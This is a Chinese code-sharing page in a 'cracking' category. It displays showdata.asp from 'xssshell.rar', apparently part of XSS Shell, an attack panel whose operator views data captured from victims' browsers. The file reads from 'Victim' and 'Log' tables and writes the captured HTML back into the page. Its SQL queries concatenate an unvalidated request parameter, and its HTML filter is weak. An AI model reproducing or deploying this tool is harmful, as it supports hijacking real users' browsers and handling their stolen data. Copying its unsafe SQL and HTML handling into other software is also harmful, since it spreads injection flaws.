开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > 系统/网络安全 > 破解 > 查看源码
showdata.asp
资源名称:xssshell.rar [点击查看]
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:2k
源码类别:

破解

开发平台:

ASP/ASPX

showdata.asp:源码内容
  1. <%
  2. '// SHOW DATA
  3. ' Show detailed data from records be carefull about backfire XSS attacks!
  5. '//HISTORY
  6. '09/08/2006
  7. ' - Started
  10. '//TODO
  11. ' - Safe HTML method (you can manually implement this page to a subpage for a more secure HTML viewing expreience)
  12. ' - Remove previously injected payload  (if any)
  14. %>
  15. <!--#include file="db.asp" -->
  17. <%
  18. protected()
  20. Dim mode
  21. mode = fm_Qnstr("m")
  23. Select Case mode
  24. Case 1
  25. ShowData
  27. Case Else
  28. ShowHTML
  30. End Select
  33. Sub ShowData()
  35. Dim RsData
  36. getRs RsData, "SELECT Data FROM Victim WHERE ID = " & fm_Qnstr("i")
  38. Response.Write "<blockquote>" & fm_Encode(RsData("Data")) & "</blockquote>"
  40. fmKill RsData
  43. End Sub
  46. Sub ShowHTML()
  48. Dim RsData
  49. getRs RsData, "SELECT ID, Data, Type, [Time] FROM Log  WHERE ID = " & fm_Qnstr("i")
  51. If RsData.EOF And RsData.BOF then Exit Sub
  53. Response.Write "Time : " & RsData("Time") & "<hr>"
  55. Dim Data2Write
  56. Data2Write = RsData("Data")
  57. fmKill RsData
  58. %>
  60. <script>
  61. window.onload=function(){
  62. var newdoc = filter(unescape("<%=Data2Write%>"));
  64. document.open();
  65. document.write(newdoc);
  66. document.close();
  67. }
  70. /*
  71.  You should;
  72. - implement your own filter here if it's not style otherwise xssshell will call itelf recursively
  73.  You can;
  74. - Build a filter for against backfire (XSS attacks from so called victim - don't forget this page and your patterns will be visible to everyone.)
  75. - or strip all HTML etc...
  77. */
  79. function filter(html){
  80. return html.replace(/<SCRIPTb[^>]*>(.*?)</SCRIPT>/i, "");
  81. }
  82. </script>
  84. <%
  86. End Sub
  87. %>